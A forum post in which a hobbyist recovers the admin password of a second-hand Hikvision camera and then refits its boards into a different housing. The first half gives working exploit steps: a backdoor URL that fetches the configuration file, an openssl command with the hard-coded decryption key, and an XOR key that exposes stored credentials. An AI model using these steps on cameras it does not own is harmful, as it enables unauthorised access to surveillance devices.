On impulse I just bought one of these - actually a DS-2CD2T42WD-I8 - off eBay as 'spares and repairs' as the user did not know the password.
His SADP screenshot showed the firmware version as 5.3.6 - so vulnerable to the Hikvision backdoor exploit.
So I'd offered to explain to him how to easily reset the password - but he just wanted to sell the camera, so I got it pretty cheap.
I could have simply used
@bp2008 updated password reset tool
Hikvision camera admin password reset tool
But I thought I'd do something more interesting and did this :
Pull a copy of the configuration file though the backdoor.
http://192.168.1.18/System/configurationFile?auth=YWRtaW46MTEK
Then this to decrypt it :
openssl enc -d -in configurationFile -out decryptedoutput -aes-128-ecb -K 279977f62f6cfd2d91cd75b889ce0c9a -nosalt -md md5
The end result still needs to be passed through a 4-byte XOR encode 0x738B5544
The XORViewThru of wxHexEditor works OK for that, allowing the save of the resultant file.
And the contents were inspected to show that the admin password=12345678a
Which worked OK.
But here's the funny thing -
Out of curiosity I looked inside to see how it was built.
And it was immediately clear that the main board hadn't been built specifically for the DS-2CD2T42WD-I8 internals.
In fact, it looked like the board out of a DS-2CD2332 turret.
And I've had one of those lying around for ages after I'd done a full erase of the flash and carelessly rebooted before re-writing.
And the fascinating thing is that the main board, and the sensor board, are a perfect fit into the DS-2CD2332 body!
I need to re-focus the lens as the plate the IR cut / sensor board fits on is a slightly different thickness, and the connector for the EXIR LEDs and light sensor is 6 pins instead of 4, but that's easily fixed.
So now I have a DS-2CD2T42WD in turret form!
And I can sell the DS-2CD2T42WD body as an IR illuminator, or a dummy CCTV camera ...
